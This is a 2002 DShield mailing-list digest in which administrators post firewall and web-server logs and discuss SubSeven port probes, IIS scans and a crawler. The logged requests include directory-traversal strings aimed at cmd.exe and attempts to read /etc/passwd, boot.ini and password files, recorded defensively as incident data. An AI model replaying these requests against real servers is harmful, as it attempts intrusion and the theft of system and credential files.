[Dshield] [LOGS] tcp:27374 upsurge? - ACID Incident Report (John Sage)

Grant Thurman Grant at Netprecision.Net
Tue Jul 2 16:47:01 GMT 2002


John,

Since I don't do any biz in Asia I have a number of blocks:

61.72.0.0 - 61.77.255.255 Kornet which covers:
#228-1| [2002-07-01 20:33:26] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven

211.200.0.0 - 211.205.255.255 which covers, HANANET >> Kornet:
#228-4| [2002-07-01 21:12:13] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven

It's not nice to have to block such large blocks of IP's and entire
countries but Kornet will do nothing about their hackers and spamers so I
just block them till such time as Korea and China decide to get real and
accept responsibility for their hackers.

Grant

-----Original Message-----
From: list-admin at dshield.org [mailto:list-admin at dshield.org]On Behalf Of
list-request at dshield.org
Sent: Tuesday, July 02, 2002 7:37 AM
To: list at dshield.org
Subject: Dshield digest, Vol 1 #682 - 6 msgs


Send Dshield mailing list submissions to
	list at dshield.org

To subscribe or unsubscribe via the World Wide Web, visit
	http://www.dshield.org/mailman/listinfo/list
or, via email, send a message with subject or body 'help' to
	list-request at dshield.org

You can reach the person managing the list at
	list-admin at dshield.org

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Dshield digest..."


Today's Topics:

   1. [LOGS] tcp:27374 upsurge? - ACID Incident Report (John Sage)
   2. Re: Anyone else?? (TranceDylan)
   3. Web server attempt (Sue Young)
   4. RE: GET /invalidfilename.htm (James C. Slora, Jr.)
   5. What is this? (Antti Tolamo)
   6. RE: GET /invalidfilename.htm??? (Russell Washington)

--__--__--

Message: 1
Date: Tue, 2 Jul 2002 05:58:52 -0700
From: John Sage <jsage at finchhaven.com>
To: list at dshield.org, intrusions at incidents.org
Subject: [Dshield] [LOGS] tcp:27374 upsurge? - ACID Incident Report
Reply-To: list at dshield.org

When looking back over the last week's records, nothing for tcp:27374
until yesterday, and then quite a few...

----- Forwarded message from ACID Alert <acid at finchhaven.com> -----

Date: Tue, 2 Jul 2002 05:52:02 -0700
Subject: ACID Incident Report
From: ACID Alert <acid at finchhaven.com>
Generated by ACID v0.9.6b21 on Tue July 02, 2002 05:52:02

For the period 06/24/02 to 07/02/02:

#228-1| [2002-07-01 20:33:26] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-2| [2002-07-01 20:33:29] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-3| [2002-07-01 20:33:35] 61.77.238.139:1697 -> 12.82.132.164:27374  TCP
to 27374 SubSeven

#228-4| [2002-07-01 21:12:13] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-5| [2002-07-01 21:12:16] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-6| [2002-07-01 21:12:22] 211.192.184.19:3317 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-7| [2002-07-01 23:05:04] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-8| [2002-07-01 23:05:07] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-9| [2002-07-01 23:05:13] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-10| [2002-07-01 23:05:24] 211.222.77.162:2977 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-11| [2002-07-01 23:17:02] 211.204.249.151:1905 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-12| [2002-07-01 23:17:05] 211.204.249.151:1905 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-13| [2002-07-01 23:17:10] 211.204.249.151:1905 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-14| [2002-07-01 23:21:27] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-15| [2002-07-01 23:21:30] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-16| [2002-07-01 23:21:36] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-17| [2002-07-01 23:21:48] 210.223.29.22:3966 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-18| [2002-07-02 00:07:40] 210.217.170.168:4182 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-19| [2002-07-02 00:07:43] 210.217.170.168:4182 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-20| [2002-07-02 00:07:49] 210.217.170.168:4182 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-21| [2002-07-02 00:10:31] 61.248.12.240:2559 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-22| [2002-07-02 00:10:34] 61.248.12.240:2559 -> 12.82.132.164:27374
TCP to 27374 SubSeven
#228-23| [2002-07-02 00:10:40] 61.248.12.240:2559 -> 12.82.132.164:27374
TCP to 27374 SubSeven

#228-27| [2002-07-02 01:04:05] 211.55.75.66:1522 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-28| [2002-07-02 01:04:08] 211.55.75.66:1522 -> 12.82.132.164:27374  TCP
to 27374 SubSeven
#228-29| [2002-07-02 01:04:14] 211.55.75.66:1522 -> 12.82.132.164:27374  TCP
to 27374 SubSeven

----- End forwarded message -----


- John
--
"You are in a little maze of twisty passages, all different."

PGP key      http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint  FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5


--__--__--

Message: 2
From: "TranceDylan" <trancedylan at blueyonder.co.uk>
To: <list at dshield.org>
Subject: Re: [Dshield] Anyone else??
Date: Tue, 2 Jul 2002 15:31:50 +0100
Reply-To: list at dshield.org

Hi,
It's just a shot in the dark, but have you ruled out someone on the network
attaching to "windows update" and then quitting the conn b4 the update has
completed?
tD


----- Original Message -----
From: "Erik J. Varney" <erik at centralsecurity.net>
To: "DShield Mailing List" <list at dshield.org>
Sent: Tuesday, July 02, 2002 1:39 PM
Subject: [Dshield] Anyone else??


> Is anyone else seeing continuous (non-stop) traffic from 207.46.138.20, it
> is hitting our network block and looking for port 80?
>
> Microsoft (NETBLK-MICROSOFT-GLOBAL-NET)
>    One Redmond Way
>    Redmond, WA 98052
>    US
>
>    Netname: MICROSOFT-GLOBAL-NET
>    Netblock: 207.46.0.0 - 207.46.255.255
>
>    Coordinator:
>       Microsoft  (ZM39-ARIN)  noc at microsoft.com
>       425-936-4200
>
>    Domain System inverse mapping provided by:
>
>    DNS1.CP.MSFT.NET 207.46.138.20
>    DNS2.CP.MSFT.NET 207.46.138.21
>    DNS1.TK.MSFT.NET 207.46.232.37
>    DNS1.DC.MSFT.NET 207.68.128.151
>    DNS1.SJ.MSFT.NET 207.46.97.11
>
>    Record last updated on 20-Jun-2001.
>    Database last updated on  1-Jul-2002 20:10:52 EDT.
>
>
> Erik
>
>


--__--__--

Message: 3
From: Sue Young <smy at gcmlp.com>
To: "'list at dshield.org'" <list at dshield.org>
Date: Tue, 2 Jul 2002 09:42:56 -0500
Subject: [Dshield] Web server attempt
Reply-To: list at dshield.org

This is the first time I've ever gotten hit from El Salvador -  This guy is
still hitting my web server today.  This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 22:39:13 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:37 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:44 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:49 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:54 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:16 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:41 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management


--__--__--

Message: 4
From: "James C. Slora, Jr." <Jim.Slora at phra.com>
To: <list at dshield.org>, <pmarsh at nmefdn.org>
Date: Tue, 2 Jul 2002 11:09:51 -0400
Subject: [Dshield] RE: GET /invalidfilename.htm
Reply-To: list at dshield.org

Paul Marsh wrote on Tue, 2 Jul 2002 08:52:02 -0400 :

>Has anyone else seen the following in there logs?  Sorry for the lengthy
log
>snippet but it's two attacks.

> 2002-07-01 14:58:07 217.82.44.2 - GET /invalidfilename.htm - 404 604 59 0
80
<snip>

I have gotten a couple of these lengthy HTTP vulnerability scans, but not in
the past few days. NESSUS (from www.nessus.org) was the product probably
used against my systems. These big loud scans have usually been from hosts
that have not scanned others (at least DShield has listed them as "clean").
The people who scanned me pinged each network host then scanned all live
hosts after waiting a few hours.

A NESSUS scan would most likely be a recon effort. The attacker would look
at the results of the scan, and decide whether the results indicate that
vulnerabilities exist. This might be followed by an exploit attempt later.
Or it could just be someone playing with NESSUS or some other scanner for no
reason at all.

- Jim


--__--__--

Message: 5
From: Antti Tolamo <Usenet at linux.tola.org>
To: list at dshield.org
Date: Tue, 2 Jul 2002 18:25:52 +0300
Subject: [Dshield] What is this?
Reply-To: list at dshield.org

I've been getting these alteast two days, from same source.
Somebody going through my servers Apache document  webpages.
This is only the part of files looked.

Yes, I do have the Apache's own web pages as a default web page
on root source: What's a 'Scooter' ? A robot?


64.152.75.38 - - [02/Jul/2002:14:10:01 +0300] "GET
/doc/apache/manual/keepalive.html HTTP/1.0" 302 205 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:14:10:01 +0300] "GET /oops.html HTTP/1.0" 200
43 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:09:57 +0300] "GET
/doc/apache/manual/configuring.html.en HTTP/1.0" 200 10443 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:14:20 +0300] "GET
/doc/apache/manual/misc/known_client_problems.html HTTP/1.0" 200 15697 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:20:11 +0300] "GET
/doc/apache/manual/netware.html HTTP/1.0" 200 13407 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:21:40 +0300] "GET
/doc/apache/manual/vhosts/name-based.html.ja.jis HTTP/1.0" 200 8670 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:32:05 +0300] "GET
/doc/apache/manual/programs/suexec.html HTTP/1.0" 200 1659 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:42:59 +0300] "GET
/doc/apache/manual/mod/mod_usertrack.html HTTP/1.0" 200 10573 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:48:18 +0300] "GET
/doc/apache/manual/index.html.en HTTP/1.0" 200 9349 "-" "Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:50:00 +0300] "GET
/doc/apache/manual/process-model.html HTTP/1.0" 200 2701 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:15:54:01 +0300] "GET
/doc/apache/manual/mod/mod_mmap_static.html HTTP/1.0" 200 5696 "-"
"Scooter-3.2.EX"

64.152.75.38 - - [02/Jul/2002:16:07:50 +0300] "GET
/doc/apache/manual/programs/httpd.html HTTP/1.0" 200 6402 "-"
"Scooter-3.2.EX"
[Tue Jul  2 16:24:57 2002] [error] [client 64.152.75.38] File does not
exist:
/usr/share/doc/apache/manual/mod/module-dict.html


--__--__--

Message: 6
From: Russell Washington <russ.washington at vaultsentry.com>
To: "'list at dshield.org'" <list at dshield.org>
Subject: RE: [Dshield] GET /invalidfilename.htm???
Date: Tue, 2 Jul 2002 08:30:34 -0700
Reply-To: list at dshield.org

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C221DD.686AE480
Content-Type: text/plain

It's clearly (at least to me, could be wrong) a vulnerability scan-- maybe
someone pointed Nessus at you??

-----Original Message-----
From: Paul Marsh [mailto:pmarsh at nmefdn.org]
Sent: Tuesday, July 02, 2002 5:52 AM
To: 'Dshield (E-mail)
Subject: [Dshield] GET /invalidfilename.htm???



Has anyone else seen the following in there logs?  Sorry for the lengthy log
snippet but it's two attacks.

TIA, Paul

2002-07-01 14:58:07 217.82.44.2 - GET /invalidfilename.htm - 404 604 59 0 80
- - -
2002-07-01 14:58:07 217.82.44.2 - GET /invalidfilename.cgi - 404 604 59 0 80
- - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/auktion.pl 404 604 58 15 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/simplestguest.cgi 404 604 65 47 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /msadc/msadcs.dll - 404 604 56 0 80 -
- -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/script/tools/newdsn.exe 404 604 63 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-winuploader.exe 404 604 59 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/imagemap.exe 404 604 60 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/shop.cgi 404 604 56 16 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/textcounter.pl 404 604 62 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/iisadmin/ism.dll 404 604 64 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/samples/ctguestb.idc 404 604 68 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/perl.exe 404 604 56 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /msadc/samples/ - 404 604 54 0 80 - -
-
2002-07-01 14:58:50 217.82.44.2 - GET /msadc/Samples/SELECTOR/showcode.asp -
404 604 75 16 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../sensepost.exe 404 604 82 0 80 - - -

2002-07-01 14:58:50 217.82.44.2 - GET /etc/passwd - 404 604 83 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/default.asp%20.pl 404 604 65 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/fpcount.exe 404 604 59 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /iisadmpwd/ - 404 604 50 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /_vti_pvt/users.pwd - 404 604 58 0 80
- - -
2002-07-01 14:58:50 217.82.44.2 - GET /graphics/sml3com - 404 604 56 0 80 -
- -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.ex
e 404 604 126 0 80 - - -

2002-07-01 14:58:50 217.82.44.2 - GET /index.php
|=../../../../../../../../etc/passwd 404 604 87 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /index.php
|=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd1.exe 404 604 77 0 80 - - -
2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/C:/temp/\../
404 604 52 0 80 - - -
2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 111 0
80 - - -

2002-07-01 14:58:51 217.82.44.2 - GET /index.php
l=../../../../../../../../etc/passwd 404 604 86 16 80 - - -
2002-07-01 14:58:51 217.82.44.2 - GET /index.php
l=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd.exe 404 604 76 0 80 - - -
2002-07-01 14:58:52 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..\..\..\..\..\autoexec.bat 404 604 67 0 80 - - -
2002-07-01 14:58:52 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 109
0 80 - - -

2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/sensepost.exe 404 604 70 15 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/..\..\..\boot.ini 404 604 57 16 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/_vti_bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 108
0 80 - - -

2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd1.exe 404 604 65 0 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/../../../boot.ini 404 604 57 0 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 105 0
80 - - -

2002-07-01 14:58:55 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd.exe 404 604 64 16 80 - - -
2002-07-01 14:58:55 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/..%255c..%255cwinnt/system32/cmd.exe 404 604 95 0 80 - - -

2002-07-01 14:58:56 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/samples/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:58:56 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/samples/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:58:59 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/samples/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:58:59 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:59:01 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:01 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:59:02 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_cnf/sensepost.exe 404 604 68 16 80 - - -
2002-07-01 14:59:06 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:06 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:59:07 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:59:07 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:09 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd.exe 404 604 62 0 80 - - -
2002-07-01 14:59:09 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/msadc/sensepost.exe 404 604 66 0 80 - - -
2002-07-01 14:59:10 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/msadc/cmd1.exe 404 604 61 0 80 - - -
2002-07-01 14:59:14 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/msadc/cmd.exe
404 604 60 0 80 - - -
2002-07-01 14:59:14 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 14:59:16 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 14:59:16 217.82.44.2 - GET /<Rejected-By-UrlScan>
~/scripts/cmd.exe 404 604 62 16 80 - - -
2002-07-01 14:59:17 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/sensepost.exe
404 604 60 0 80 - - -
2002-07-01 14:59:18 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/cmd1.exe 404
604 55 0 80 - - -
2002-07-01 14:59:18 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/cmd.exe 404
604 54 0 80 - - -


2002-07-01 17:38:03 80.129.106.43 - GET /index.asp - 200 21849 40 703 80 - -
-
2002-07-01 17:38:34 80.129.106.43 - GET /invalidfilename.htm - 404 604 59 0
80 - - -
2002-07-01 17:38:34 80.129.106.43 - GET /invalidfilename.cgi - 404 604 59 0
80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/auktion.pl 404 604 58 16 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/imagemap.exe 404 604 60 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/shop.cgi 404 604 56 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/textcounter.pl 404 604 62 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-winuploader.exe 404 604 59 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/iisadmin/ism.dll 404 604 64 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/samples/ctguestb.idc 404 604 68 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /msadc/msadcs.dll - 404 604 56 0 80
- - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/simplestguest.cgi 404 604 65 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/script/tools/newdsn.exe 404 604 63 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/perl.exe 404 604 56 16 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /msadc/samples/ - 404 604 54 0 80 -
- -
2002-07-01 17:39:17 80.129.106.43 - GET /msadc/Samples/SELECTOR/showcode.asp
- 404 604 75 16 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../sensepost.exe 404 604 82 0 80 - - -

2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/default.asp%20.pl 404 604 65 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /etc/passwd - 404 604 83 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/fpcount.exe 404 604 59 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /_vti_pvt/users.pwd - 404 604 58 0
80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /iisadmpwd/ - 404 604 50 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.ex
e 404 604 126 0 80 - - -

2002-07-01 17:39:17 80.129.106.43 - GET /graphics/sml3com - 404 604 56 0 80
- - -
2002-07-01 17:39:17 80.129.106.43 - GET /index.php
|=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 17:39:17 80.129.106.43 - GET /index.php
|=../../../../../../../../etc/passwd 404 604 87 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd1.exe 404 604 77 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/C:/temp/\../ 404 604 52 15 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 111 0
80 - - -

2002-07-01 17:39:18 80.129.106.43 - GET /index.php
l=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 17:39:18 80.129.106.43 - GET /index.php
l=../../../../../../../../etc/passwd 404 604 86 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd.exe 404 604 76 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..\..\..\..\..\autoexec.bat 404 604 67 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 109
0 80 - - -

2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/sensepost.exe 404 604 70 0 80 - - -
2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..\..\..\boot.ini 404 604 57 0 80 - - -
2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/_vti_bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 108
0 80 - - -

2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd1.exe 404 604 65 0 80 - - -
2002-07-01 17:39:21 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/../../../boot.ini 404 604 57 16 80 - - -
2002-07-01 17:39:22 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd.exe 404 604 64 0 80 - - -
2002-07-01 17:39:22 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/samples/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:23 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/samples/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:23 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 105 0
80 - - -

